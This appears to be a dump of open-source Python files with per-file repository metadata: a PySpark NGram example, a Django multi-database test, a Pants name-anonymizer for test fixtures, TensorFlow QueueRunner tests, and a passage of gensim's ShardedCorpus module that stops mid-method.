# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
# $example on$
from pyspark.ml.feature import NGram
# $example off$
from pyspark.sql import SparkSession
if __name__ == "__main__":
spark = SparkSession\
.builder\
.appName("NGramExample")\
.getOrCreate()
# $example on$
wordDataFrame = spark.createDataFrame([
(0, ["Hi", "I", "heard", "about", "Spark"]),
(1, ["I", "wish", "Java", "could", "use", "case", "classes"]),
(2, ["Logistic", "regression", "models", "are", "neat"])
], ["id", "words"])
ngram = NGram(n=2, inputCol="words", outputCol="ngrams")
ngramDataFrame = ngram.transform(wordDataFrame)
ngramDataFrame.select("ngrams").show(truncate=False)
# $example off$
spark.stop()
| apache-2.0 | 796,762,692,266,558,700 | 34.113636 | 74 | 0.682201 | false |
t0in4/django | tests/check_framework/test_multi_db.py | 191 | 1682 | from django.db import connections, models
from django.test import TestCase, mock
from django.test.utils import override_settings
from .tests import IsolateModelsMixin
class TestRouter(object):
"""
Routes to the 'other' database if the model name starts with 'Other'.
"""
def allow_migrate(self, db, app_label, model=None, **hints):
return db == ('other' if model._meta.verbose_name.startswith('other') else 'default')
@override_settings(DATABASE_ROUTERS=[TestRouter()])
class TestMultiDBChecks(IsolateModelsMixin, TestCase):
multi_db = True
def _patch_check_field_on(self, db):
return mock.patch.object(connections[db].validation, 'check_field')
def test_checks_called_on_the_default_database(self):
class Model(models.Model):
field = models.CharField(max_length=100)
model = Model()
with self._patch_check_field_on('default') as mock_check_field_default:
with self._patch_check_field_on('other') as mock_check_field_other:
model.check()
self.assertTrue(mock_check_field_default.called)
self.assertFalse(mock_check_field_other.called)
def test_checks_called_on_the_other_database(self):
class OtherModel(models.Model):
field = models.CharField(max_length=100)
model = OtherModel()
with self._patch_check_field_on('other') as mock_check_field_other:
with self._patch_check_field_on('default') as mock_check_field_default:
model.check()
self.assertTrue(mock_check_field_other.called)
self.assertFalse(mock_check_field_default.called)
| bsd-3-clause | 215,806,418,526,590,750 | 38.116279 | 93 | 0.661712 | false |
Ervii/garage-time | garage/src/python/pants/backend/jvm/tasks/jvm_compile/anonymizer.py | 2 | 4846 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (nested_scopes, generators, division, absolute_import, with_statement,
print_function, unicode_literals)
import base64
import os
import random
import re
_default_keep_words = [
'AAAAAAAAAAA=',
'analysis',
'anonfun',
'apply',
'beta',
'class',
'classes',
'com',
'd',
'home',
'jar',
'jars',
'java',
'javac',
'jvm',
'lib',
'library',
'pants',
'rt',
'scala',
'scalac',
'src',
'unapply',
'users',
'web'
]
_default_word_map = {
'foursquare': 'acme',
'benjy': 'kermit'
}
# TODO: Move somewhere more general? Could also be used to anonymize source files.
class Anonymizer(object):
"""Anonymizes names in analysis files.
Will replace all words in word_map with the corresponding value.
Will replace all other words with a random word from word_list, except for
words in keep.
Replacements are 1:1, and therefore invertible.
Useful for obfuscating real-life analysis files so we can use them in tests without
leaking proprietary information.
"""
# Utility method for anonymizing base64-encoded binary data in analysis files.
@staticmethod
def _random_base64_string():
n = random.randint(20, 200)
return base64.b64encode(os.urandom(n))
# Break on delimiters (digits, space, forward slash, dash, underscore, dollar, period) and on
# upper-case letters.
_DELIMITER = r'\d|\s|/|-|_|\$|\.'
_UPPER = r'[A-Z]'
_UPPER_CASE_RE = re.compile(r'^%s$' % _UPPER)
_DELIMITER_RE = re.compile(r'^%s$' % _DELIMITER)
_BREAK_ON_RE = re.compile(r'(%s|%s)' % (_DELIMITER, _UPPER)) # Capture what we broke on.
# Valid replacement words must be all lower-case letters, with no apostrophes etc.
_WORD_RE = re.compile(r'^[a-z]+$')
def __init__(self, word_list, word_map=None, keep=None, strict=False):
self._translations = {}
self._reverse_translations = {}
# Init from args.
for k, v in (_default_word_map if word_map is None else word_map).items():
self._add_translation(k, v)
for w in _default_keep_words if keep is None else keep:
self._add_translation(w, w)
# Prepare list of candidate translations.
self._unused_words = list(
set(filter(Anonymizer._WORD_RE.match, word_list)) -
set(self._translations.values()) -
set(self._translations.keys()))
random.shuffle(self._unused_words)
self._strict = strict
# If we're not strict and we run out of replacement words, we count how many more words
# we need, so we can give a useful error message to that effect.
self._words_needed = 0
def words_needed(self):
return self._words_needed
def check_for_comprehensiveness(self):
if self._words_needed:
raise Exception('Need %d more words in word_list for full anonymization.' % self._words_needed)
def convert(self, s):
parts = Anonymizer._BREAK_ON_RE.split(s)
parts_iter = iter(parts)
converted_parts = []
for part in parts_iter:
if part == '' or Anonymizer._DELIMITER_RE.match(part):
converted_parts.append(part)
elif Anonymizer._UPPER_CASE_RE.match(part):
# Join to the rest of the word, if any.
token = part
try:
token += parts_iter.next()
except StopIteration:
pass
converted_parts.append(self._convert_single_token(token))
else:
converted_parts.append(self._convert_single_token(part))
return ''.join(converted_parts)
def convert_base64_string(self, s):
translation = self._translations.get(s)
if translation is None:
translation = Anonymizer._random_base64_string()
self._add_translation(s, translation)
return translation
def _convert_single_token(self, token):
lower = token.lower()
translation = self._translations.get(lower)
if translation is None:
if not self._unused_words:
if self._strict:
raise Exception('Ran out of words to translate to.')
else:
self._words_needed += 1
translation = lower
else:
translation = self._unused_words.pop()
self._add_translation(lower, translation)
# Use the same capitalization as the original word.
if token[0].isupper():
return translation.capitalize()
else:
return translation
def _add_translation(self, frm, to):
if frm in self._translations:
raise Exception('Word already has translation: %s -> %s' % (frm, self._translations[frm]))
if to in self._reverse_translations:
raise Exception('Translation target already used: %s -> %s' % (self._reverse_translations[to], to))
self._translations[frm] = to
self._reverse_translations[to] = frm
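# A minimal usage sketch for Anonymizer, assuming a made-up word list and
# input path; it only exercises the public convert() API defined above.
def _example_anonymizer_usage():
  anonymizer = Anonymizer(word_list=['alpha', 'bravo', 'charlie', 'delta', 'echo'])
  # 'foursquare' maps to 'acme' via the default word map, keep-words such as
  # 'users' and 'src' stay unchanged, and the remaining words get random
  # replacements drawn from word_list. Capitalization and delimiters survive.
  converted = anonymizer.convert('/Users/foursquare/src/MyProject')
  anonymizer.check_for_comprehensiveness()
  return converted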
| apache-2.0 | -914,592,778,820,087,900 | 28.91358 | 105 | 0.652084 | false |
brendandburns/tensorflow | tensorflow/python/training/queue_runner_test.py | 5 | 6725 | """Tests for QueueRunner."""
import time
import tensorflow.python.platform
import tensorflow as tf
class QueueRunnerTest(tf.test.TestCase):
def testBasic(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
tf.initialize_all_variables().run()
qr = tf.train.QueueRunner(queue, [count_up_to])
threads = qr.create_threads(sess)
for t in threads:
t.start()
for t in threads:
t.join()
self.assertEqual(0, len(qr.exceptions_raised))
# The variable should be 3.
self.assertEqual(3, var.eval())
def testTwoOps(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var0 = tf.Variable(zero64)
count_up_to_3 = var0.count_up_to(3)
var1 = tf.Variable(zero64)
count_up_to_30 = var1.count_up_to(30)
queue = tf.FIFOQueue(10, tf.float32)
qr = tf.train.QueueRunner(queue, [count_up_to_3, count_up_to_30])
threads = qr.create_threads(sess)
tf.initialize_all_variables().run()
for t in threads:
t.start()
for t in threads:
t.join()
self.assertEqual(0, len(qr.exceptions_raised))
self.assertEqual(3, var0.eval())
self.assertEqual(30, var1.eval())
def testExceptionsCaptured(self):
with self.test_session() as sess:
queue = tf.FIFOQueue(10, tf.float32)
qr = tf.train.QueueRunner(queue, ["i fail", "so fail"])
threads = qr.create_threads(sess)
tf.initialize_all_variables().run()
for t in threads:
t.start()
for t in threads:
t.join()
exceptions = qr.exceptions_raised
self.assertEqual(2, len(exceptions))
self.assertTrue("Operation not in the graph" in str(exceptions[0]))
self.assertTrue("Operation not in the graph" in str(exceptions[1]))
def testRealDequeueEnqueue(self):
with self.test_session() as sess:
q0 = tf.FIFOQueue(3, tf.float32)
enqueue0 = q0.enqueue((10.0,))
close0 = q0.close()
q1 = tf.FIFOQueue(30, tf.float32)
enqueue1 = q1.enqueue((q0.dequeue(),))
dequeue1 = q1.dequeue()
qr = tf.train.QueueRunner(q1, [enqueue1])
threads = qr.create_threads(sess)
for t in threads:
t.start()
# Enqueue 2 values, then close queue0.
enqueue0.run()
enqueue0.run()
close0.run()
# Wait for the queue runner to terminate.
for t in threads:
t.join()
# It should have terminated cleanly.
self.assertEqual(0, len(qr.exceptions_raised))
# The 2 values should be in queue1.
self.assertEqual(10.0, dequeue1.eval())
self.assertEqual(10.0, dequeue1.eval())
# And queue1 should now be closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError, "is closed"):
dequeue1.eval()
def testRespectCoordShouldStop(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
tf.initialize_all_variables().run()
qr = tf.train.QueueRunner(queue, [count_up_to])
      # Ask the coordinator to stop. The queue runner should
# finish immediately.
coord = tf.train.Coordinator()
coord.request_stop()
threads = qr.create_threads(sess, coord)
for t in threads:
t.start()
coord.join(threads)
self.assertEqual(0, len(qr.exceptions_raised))
# The variable should be 0.
self.assertEqual(0, var.eval())
def testRequestStopOnException(self):
with self.test_session() as sess:
queue = tf.FIFOQueue(10, tf.float32)
qr = tf.train.QueueRunner(queue, ["not an op"])
coord = tf.train.Coordinator()
threads = qr.create_threads(sess, coord)
for t in threads:
t.start()
# The exception should be re-raised when joining.
with self.assertRaisesRegexp(ValueError, "Operation not in the graph"):
coord.join(threads)
def testGracePeriod(self):
with self.test_session() as sess:
# The enqueue will quickly block.
queue = tf.FIFOQueue(2, tf.float32)
enqueue = queue.enqueue((10.0,))
dequeue = queue.dequeue()
qr = tf.train.QueueRunner(queue, [enqueue])
coord = tf.train.Coordinator()
threads = qr.create_threads(sess, coord, start=True)
# Dequeue one element and then request stop.
dequeue.op.run()
time.sleep(0.02)
coord.request_stop()
# We should be able to join because the RequestStop() will cause
# the queue to be closed and the enqueue to terminate.
coord.join(threads, stop_grace_period_secs=0.05)
def testNoMultiThreads(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
tf.initialize_all_variables().run()
coord = tf.train.Coordinator()
qr = tf.train.QueueRunner(queue, [count_up_to])
threads = []
threads.extend(qr.create_threads(sess, coord=coord))
with self.assertRaisesRegexp(
RuntimeError,
"Threads are already running"):
threads.extend(qr.create_threads(sess, coord=coord))
coord.request_stop()
coord.join(threads, stop_grace_period_secs=0.5)
def testThreads(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
tf.initialize_all_variables().run()
qr = tf.train.QueueRunner(queue, [count_up_to, "bad op"])
threads = qr.create_threads(sess, start=True)
for t in threads:
t.join()
exceptions = qr.exceptions_raised
self.assertEqual(1, len(exceptions))
self.assertTrue("Operation not in the graph" in str(exceptions[0]))
threads = qr.create_threads(sess, start=True)
for t in threads:
t.join()
exceptions = qr.exceptions_raised
self.assertEqual(1, len(exceptions))
self.assertTrue("Operation not in the graph" in str(exceptions[0]))
if __name__ == "__main__":
tf.test.main()
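# A condensed sketch of the pattern the tests above exercise: a QueueRunner
# keeps an enqueue op running on background threads, and a Coordinator stops
# them and re-raises any exception on join().
def _example_queue_runner_pattern():
  with tf.Session() as sess:
    queue = tf.FIFOQueue(10, tf.float32)
    enqueue = queue.enqueue((1.0,))
    qr = tf.train.QueueRunner(queue, [enqueue])
    coord = tf.train.Coordinator()
    threads = qr.create_threads(sess, coord=coord, start=True)
    value = sess.run(queue.dequeue())  # consume one element
    coord.request_stop()
    coord.join(threads, stop_grace_period_secs=0.5)
    return value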
| apache-2.0 | -1,303,419,447,974,835,700 | 35.155914 | 77 | 0.635985 | false |
sebastien-j/gensim | gensim/corpora/sharded_corpus.py | 63 | 35097 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Original author: Jan Hajic jr.
# Copyright (C) 2015 Radim Rehurek and gensim team.
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
This module implements a corpus class that stores its data in separate files called
"shards". This is a compromise between speed (keeping the whole dataset
in memory) and memory footprint (keeping the data on disk and reading from it
on demand).
The corpus is intended for situations where you need to use your data
as numpy arrays for some iterative processing (like training something
using SGD, which usually involves heavy matrix multiplication).
"""
from __future__ import print_function
import logging
import os
import math
import numpy
import scipy.sparse as sparse
import time
logger = logging.getLogger(__name__)
#: Specifies which dtype should be used for serializing the shards.
_default_dtype = float
try:
import theano
_default_dtype = theano.config.floatX
except ImportError:
logger.info('Could not import Theano, will use standard float for default ShardedCorpus dtype.')
from six.moves import xrange
import gensim
from gensim.corpora import IndexedCorpus
from gensim.interfaces import TransformedCorpus
class ShardedCorpus(IndexedCorpus):
"""
This corpus is designed for situations where you need to train a model
on matrices, with a large number of iterations. (It should be faster than
gensim's other IndexedCorpus implementations for this use case; check the
`benchmark_datasets.py` script. It should also serialize faster.)
The corpus stores its data in separate files called
"shards". This is a compromise between speed (keeping the whole dataset
in memory) and memory footprint (keeping the data on disk and reading from
it on demand). Persistence is done using the standard gensim load/save methods.
.. note::
The dataset is **read-only**, there is - as opposed to gensim's Similarity
class, which works similarly - no way of adding documents to the dataset
(for now).
You can use ShardedCorpus to serialize your data just like any other gensim
corpus that implements serialization. However, because the data is saved
as numpy 2-dimensional ndarrays (or scipy sparse matrices), you need to
supply the dimension of your data to the corpus. (The dimension of word
frequency vectors will typically be the size of the vocabulary, etc.)
>>> corpus = gensim.utils.mock_data()
>>> output_prefix = 'mydata.shdat'
>>> ShardedCorpus.serialize(output_prefix, corpus, dim=1000)
The `output_prefix` tells the ShardedCorpus where to put the data.
Shards are saved as `output_prefix.0`, `output_prefix.1`, etc.
All shards must be of the same size. The shards can be re-sized (which
is essentially a re-serialization into new-size shards), but note that
this operation will temporarily take twice as much disk space, because
the old shards are not deleted until the new shards are safely in place.
After serializing the data, the corpus will then save itself to the file
`output_prefix`.
On further initialization with the same `output_prefix`, the corpus
will load the already built dataset unless the `overwrite` option is
given. (A new object is "cloned" from the one saved to `output_prefix`
previously.)
To retrieve data, you can load the corpus and use it like a list:
>>> sh_corpus = ShardedCorpus.load(output_prefix)
>>> batch = sh_corpus[100:150]
This will retrieve a numpy 2-dimensional array of 50 rows and 1000
columns (1000 was the dimension of the data we supplied to the corpus).
To retrieve gensim-style sparse vectors, set the `gensim` property:
>>> sh_corpus.gensim = True
>>> batch = sh_corpus[100:150]
The batch now will be a generator of gensim vectors.
Since the corpus needs the data serialized in order to be able to operate,
it will serialize data right away on initialization. Instead of calling
`ShardedCorpus.serialize()`, you can just initialize and use the corpus
right away:
>>> corpus = ShardedCorpus(output_prefix, corpus, dim=1000)
>>> batch = corpus[100:150]
ShardedCorpus also supports working with scipy sparse matrices, both
during retrieval and during serialization. If you want to serialize your
data as sparse matrices, set the `sparse_serialization` flag. For
retrieving your data as sparse matrices, use the `sparse_retrieval`
flag. (You can also retrieve densely serialized data as sparse matrices,
for the sake of completeness, and vice versa.) By default, the corpus
will retrieve numpy ndarrays even if it was serialized into sparse
matrices.
>>> sparse_prefix = 'mydata.sparse.shdat'
>>> ShardedCorpus.serialize(sparse_prefix, corpus, dim=1000, sparse_serialization=True)
>>> sparse_corpus = ShardedCorpus.load(sparse_prefix)
>>> batch = sparse_corpus[100:150]
>>> type(batch)
<type 'numpy.ndarray'>
>>> sparse_corpus.sparse_retrieval = True
>>> batch = sparse_corpus[100:150]
<class 'scipy.sparse.csr.csr_matrix'>
While you *can* touch the `sparse_retrieval` attribute during the life
    of a ShardedCorpus object, you should definitely not touch
    `sparse_serialization`! Changing the attribute will not miraculously
re-serialize the data in the requested format.
The CSR format is used for sparse data throughout.
Internally, to retrieve data, the dataset keeps track of which shard is
currently open and on a `__getitem__` request, either returns an item from
the current shard, or opens a new one. The shard size is constant, except
for the last shard.
"""
def __init__(self, output_prefix, corpus, dim=None,
shardsize=4096, overwrite=False, sparse_serialization=False,
sparse_retrieval=False, gensim=False):
"""Initializes the dataset. If `output_prefix` is not found,
builds the shards.
:type output_prefix: str
:param output_prefix: The absolute path to the file from which shard
filenames should be derived. The individual shards will be saved
as `output_prefix.0`, `output_prefix.1`, etc.
The `output_prefix` path then works as the filename to which
the ShardedCorpus object itself will be automatically saved.
Normally, gensim corpora do not do this, but ShardedCorpus needs
to remember several serialization settings: namely the shard
size and whether it was serialized in dense or sparse format. By
saving automatically, any new ShardedCorpus with the same
`output_prefix` will be able to find the information about the
data serialized with the given prefix.
If you want to *overwrite* your data serialized with some output
prefix, set the `overwrite` flag to True.
Of course, you can save your corpus separately as well using
the `save()` method.
:type corpus: gensim.interfaces.CorpusABC
:param corpus: The source corpus from which to build the dataset.
:type dim: int
:param dim: Specify beforehand what the dimension of a dataset item
should be. This is useful when initializing from a corpus that
doesn't advertise its dimension, or when it does and you want to
check that the corpus matches the expected dimension. **If `dim`
is left unused and `corpus` does not provide its dimension in
an expected manner, initialization will fail.**
:type shardsize: int
:param shardsize: How many data points should be in one shard. More
data per shard means less shard reloading but higher memory usage
and vice versa.
:type overwrite: bool
:param overwrite: If set, will build dataset from given corpus even
if `output_prefix` already exists.
:type sparse_serialization: bool
:param sparse_serialization: If set, will save the data in a sparse
form (as csr matrices). This is to speed up retrieval when you
know you will be using sparse matrices.
..note::
This property **should not change** during the lifetime of
the dataset. (If you find out you need to change from a sparse
to a dense representation, the best practice is to create
another ShardedCorpus object.)
:type sparse_retrieval: bool
:param sparse_retrieval: If set, will retrieve data as sparse vectors
(numpy csr matrices). If unset, will return ndarrays.
Note that retrieval speed for this option depends on how the dataset
was serialized. If `sparse_serialization` was set, then setting
`sparse_retrieval` will be faster. However, if the two settings
do not correspond, the conversion on the fly will slow the dataset
down.
:type gensim: bool
:param gensim: If set, will convert the output to gensim
sparse vectors (list of tuples (id, value)) to make it behave like
any other gensim corpus. This **will** slow the dataset down.
"""
self.output_prefix = output_prefix
self.shardsize = shardsize
self.n_docs = 0
self.offsets = []
self.n_shards = 0
self.dim = dim # This number may change during initialization/loading.
# Sparse vs. dense serialization and retrieval.
self.sparse_serialization = sparse_serialization
self.sparse_retrieval = sparse_retrieval
self.gensim = gensim
# The "state" of the dataset.
self.current_shard = None # The current shard itself (numpy ndarray)
self.current_shard_n = None # Current shard is the current_shard_n-th
self.current_offset = None # The index into the dataset which
# corresponds to index 0 of current shard
logger.info('Initializing sharded corpus with prefix '
'{0}'.format(output_prefix))
if (not os.path.isfile(output_prefix)) or overwrite:
logger.info('Building from corpus...')
self.init_shards(output_prefix, corpus, shardsize)
# Save automatically, to facilitate re-loading
# and retain information about how the corpus
# was serialized.
logger.info('Saving ShardedCorpus object to '
'{0}'.format(self.output_prefix))
self.save()
else:
logger.info('Cloning existing...')
self.init_by_clone()
def init_shards(self, output_prefix, corpus, shardsize=4096, dtype=_default_dtype):
"""Initialize shards from the corpus."""
if not gensim.utils.is_corpus(corpus):
raise ValueError('Cannot initialize shards without a corpus to read'
' from! (Got corpus type: {0})'.format(type(corpus)))
proposed_dim = self._guess_n_features(corpus)
if proposed_dim != self.dim:
if self.dim is None:
logger.info('Deriving dataset dimension from corpus: '
'{0}'.format(proposed_dim))
else:
logger.warn('Dataset dimension derived from input corpus diffe'
'rs from initialization argument, using corpus.'
'(corpus {0}, init arg {1})'.format(proposed_dim,
self.dim))
self.dim = proposed_dim
self.offsets = [0]
start_time = time.clock()
logger.info('Running init from corpus.')
for n, doc_chunk in enumerate(gensim.utils.grouper(corpus, chunksize=shardsize)):
logger.info('Chunk no. {0} at {1} s'.format(n, time.clock() - start_time))
current_shard = numpy.zeros((len(doc_chunk), self.dim), dtype=dtype)
logger.debug('Current chunk dimension: '
'{0} x {1}'.format(len(doc_chunk), self.dim))
for i, doc in enumerate(doc_chunk):
doc = dict(doc)
current_shard[i][list(doc)] = list(gensim.matutils.itervalues(doc))
# Handles the updating as well.
if self.sparse_serialization:
current_shard = sparse.csr_matrix(current_shard)
self.save_shard(current_shard)
end_time = time.clock()
logger.info('Built {0} shards in {1} s.'.format(self.n_shards, end_time - start_time))
def init_by_clone(self):
"""
Initialize by copying over attributes of another ShardedCorpus
instance saved to the output_prefix given at __init__().
"""
temp = self.__class__.load(self.output_prefix)
self.n_shards = temp.n_shards
self.n_docs = temp.n_docs
self.offsets = temp.offsets
if temp.dim != self.dim:
if self.dim is None:
logger.info('Loaded dataset dimension: {0}'.format(temp.dim))
else:
logger.warn('Loaded dataset dimension differs from init arg '
'dimension, using loaded dim. '
'(loaded {0}, init {1})'.format(temp.dim, self.dim))
self.dim = temp.dim # To be consistent with the loaded data!
def save_shard(self, shard, n=None, filename=None):
"""
Pickle the given shard. If `n` is not given, will consider the shard
a new one.
If `filename` is given, will use that file name instead of generating
one.
"""
new_shard = False
if n is None:
n = self.n_shards # Saving the *next* one by default.
new_shard = True
if not filename:
filename = self._shard_name(n)
gensim.utils.pickle(shard, filename)
if new_shard:
self.offsets.append(self.offsets[-1] + shard.shape[0])
self.n_docs += shard.shape[0]
self.n_shards += 1
def load_shard(self, n):
"""
Load (unpickle) the n-th shard as the "live" part of the dataset
into the Dataset object."""
#logger.debug('ShardedCorpus loading shard {0}, '
# 'current shard: {1}'.format(n, self.current_shard_n))
# No-op if the shard is already open.
if self.current_shard_n == n:
return
filename = self._shard_name(n)
if not os.path.isfile(filename):
raise ValueError('Attempting to load nonexistent shard no. {0}'.format(n))
shard = gensim.utils.unpickle(filename)
self.current_shard = shard
self.current_shard_n = n
self.current_offset = self.offsets[n]
def reset(self):
"""
Reset to no shard at all. Used for saving.
"""
self.current_shard = None
self.current_shard_n = None
self.current_offset = None
def shard_by_offset(self, offset):
"""
Determine which shard the given offset belongs to. If the offset
is greater than the number of available documents, raises a
`ValueError`.
Assumes that all shards have the same size.
"""
k = int(offset / self.shardsize)
if offset >= self.n_docs:
raise ValueError('Too high offset specified ({0}), available '
'docs: {1}'.format(offset, self.n_docs))
if offset < 0:
raise ValueError('Negative offset {0} currently not'
' supported.'.format(offset))
return k
k = -1
for i, o in enumerate(self.offsets):
if o > offset: # Condition should fire for every valid offset,
# since the last offset is n_docs (one-past-end).
k = i - 1 # First offset is always 0, so i is at least 1.
break
return k
def in_current(self, offset):
"""
Determine whether the given offset falls within the current shard.
"""
return (self.current_offset <= offset) \
and (offset < self.offsets[self.current_shard_n + 1])
def in_next(self, offset):
"""
Determine whether the given offset falls within the next shard.
This is a very small speedup: typically, we will be iterating through
the data forward. Could save considerable time with a very large number
of smaller shards.
"""
if self.current_shard_n == self.n_shards:
return False # There's no next shard.
return (self.offsets[self.current_shard_n + 1] <= offset) \
and (offset < self.offsets[self.current_shard_n + 2])
def resize_shards(self, shardsize):
"""
Re-process the dataset to new shard size. This may take pretty long.
Also, note that you need some space on disk for this one (we're
assuming there is enough disk space for double the size of the dataset
and that there is enough memory for old + new shardsize).
:type shardsize: int
:param shardsize: The new shard size.
"""
# Determine how many new shards there will be
n_new_shards = int(math.floor(self.n_docs / float(shardsize)))
if self.n_docs % shardsize != 0:
n_new_shards += 1
new_shard_names = []
new_offsets = [0]
for new_shard_idx in xrange(n_new_shards):
new_start = shardsize * new_shard_idx
new_stop = new_start + shardsize
# Last shard?
if new_stop > self.n_docs:
# Sanity check
assert new_shard_idx == n_new_shards - 1, \
'Shard no. {0} that ends at {1} over last document' \
' ({2}) is not the last projected shard ({3})???' \
''.format(new_shard_idx, new_stop, self.n_docs, n_new_shards)
new_stop = self.n_docs
new_shard = self[new_start:new_stop]
new_shard_name = self._resized_shard_name(new_shard_idx)
new_shard_names.append(new_shard_name)
try:
self.save_shard(new_shard, new_shard_idx, new_shard_name)
except Exception:
# Clean up on unsuccessful resize.
for new_shard_name in new_shard_names:
os.remove(new_shard_name)
raise
new_offsets.append(new_stop)
# Move old shard files out, new ones in. Complicated due to possibility
# of exceptions.
old_shard_names = [self._shard_name(n) for n in xrange(self.n_shards)]
try:
for old_shard_n, old_shard_name in enumerate(old_shard_names):
os.remove(old_shard_name)
except Exception as e:
logger.error('Exception occurred during old shard no. {0} '
'removal: {1}.\nAttempting to at least move '
'new shards in.'.format(old_shard_n, str(e)))
finally:
# If something happens with cleaning up - try to at least get the
# new guys in.
try:
for shard_n, new_shard_name in enumerate(new_shard_names):
os.rename(new_shard_name, self._shard_name(shard_n))
# If something happens when we're in this stage, we're screwed.
except Exception as e:
print(e)
raise RuntimeError('Resizing completely failed for some reason.'
' Sorry, dataset is probably ruined...')
finally:
# Sets the new shard stats.
self.n_shards = n_new_shards
self.offsets = new_offsets
self.shardsize = shardsize
self.reset()
def _shard_name(self, n):
"""Generate the name for the n-th shard."""
return self.output_prefix + '.' + str(n)
def _resized_shard_name(self, n):
"""
Generate the name for the n-th new shard temporary file when
resizing dataset. The file will then be re-named to standard shard name.
"""
return self.output_prefix + '.resize-temp.' + str(n)
def _guess_n_features(self, corpus):
"""Attempt to guess number of features in `corpus`."""
n_features = None
if hasattr(corpus, 'dim'):
# print 'Guessing from \'dim\' attribute.'
n_features = corpus.dim
elif hasattr(corpus, 'dictionary'):
            # print 'Guessing from dictionary.'
n_features = len(corpus.dictionary)
elif hasattr(corpus, 'n_out'):
# print 'Guessing from \'n_out\' attribute.'
n_features = corpus.n_out
elif hasattr(corpus, 'num_terms'):
# print 'Guessing from \'num_terms\' attribute.'
n_features = corpus.num_terms
elif isinstance(corpus, TransformedCorpus):
# TransformedCorpus: first check if the transformer object
# defines some output dimension; if it doesn't, relegate guessing
# to the corpus that is being transformed. This may easily fail!
try:
return self._guess_n_features(corpus.obj)
except TypeError:
return self._guess_n_features(corpus.corpus)
else:
if not self.dim:
raise TypeError('Couldn\'t find number of features, '
'refusing to guess (dimension set to {0},'
'type of corpus: {1}).'.format(self.dim, type(corpus)))
else:
logger.warn('Couldn\'t find number of features, trusting '
'supplied dimension ({0})'.format(self.dim))
n_features = self.dim
if self.dim and n_features != self.dim:
logger.warn('Discovered inconsistent dataset dim ({0}) and '
'feature count from corpus ({1}). Coercing to dimension'
' given by argument.'.format(self.dim, n_features))
return n_features
def __len__(self):
return self.n_docs
def _ensure_shard(self, offset):
# No shard loaded
if self.current_shard is None:
shard_n = self.shard_by_offset(offset)
self.load_shard(shard_n)
# Find appropriate shard, if necessary
elif not self.in_current(offset):
if self.in_next(offset):
self.load_shard(self.current_shard_n + 1)
else:
shard_n = self.shard_by_offset(offset)
self.load_shard(shard_n)
def get_by_offset(self, offset):
"""As opposed to getitem, this one only accepts ints as offsets."""
self._ensure_shard(offset)
result = self.current_shard[offset - self.current_offset]
return result
def __getitem__(self, offset):
"""
Retrieve the given row of the dataset. Supports slice notation.
"""
if isinstance(offset, list):
# Handle all serialization & retrieval options.
if self.sparse_serialization:
l_result = sparse.vstack([self.get_by_offset(i)
for i in offset])
if self.gensim:
l_result = self._getitem_sparse2gensim(l_result)
elif not self.sparse_retrieval:
l_result = numpy.array(l_result.todense())
else:
l_result = numpy.array([self.get_by_offset(i) for i in offset])
if self.gensim:
l_result = self._getitem_dense2gensim(l_result)
elif self.sparse_retrieval:
l_result = sparse.csr_matrix(l_result)
return l_result
elif isinstance(offset, slice):
start = offset.start
stop = offset.stop
if stop > self.n_docs:
raise IndexError('Requested slice offset {0} out of range'
' ({1} docs)'.format(stop, self.n_docs))
# - get range of shards over which to iterate
first_shard = self.shard_by_offset(start)
last_shard = self.n_shards - 1
if not stop == self.n_docs:
last_shard = self.shard_by_offset(stop)
# This fails on one-past
# slice indexing; that's why there's a code branch here.
#logger.debug('ShardedCorpus: Retrieving slice {0}: '
# 'shard {1}'.format((offset.start, offset.stop),
# (first_shard, last_shard)))
self.load_shard(first_shard)
# The easy case: both in one shard.
if first_shard == last_shard:
s_result = self.current_shard[start - self.current_offset:
stop - self.current_offset]
# Handle different sparsity settings:
s_result = self._getitem_format(s_result)
return s_result
# The hard case: the slice is distributed across multiple shards
# - initialize numpy.zeros()
s_result = numpy.zeros((stop - start, self.dim),
dtype=self.current_shard.dtype)
if self.sparse_serialization:
s_result = sparse.csr_matrix((0, self.dim),
dtype=self.current_shard.dtype)
# - gradually build it up. We will be using three set of start:stop
# indexes:
# - into the dataset (these are the indexes the caller works with)
# - into the current shard
# - into the result
# Indexes into current result rows. These are always smaller than
# the dataset indexes by `start` (as we move over the shards,
# we're moving by the same number of rows through the result).
result_start = 0
result_stop = self.offsets[self.current_shard_n + 1] - start
# Indexes into current shard. These are trickiest:
# - if in starting shard, these are from (start - current_offset)
# to self.shardsize
# - if in intermediate shard, these are from 0 to self.shardsize
# - if in ending shard, these are from 0
# to (stop - current_offset)
shard_start = start - self.current_offset
shard_stop = self.offsets[self.current_shard_n + 1] - \
self.current_offset
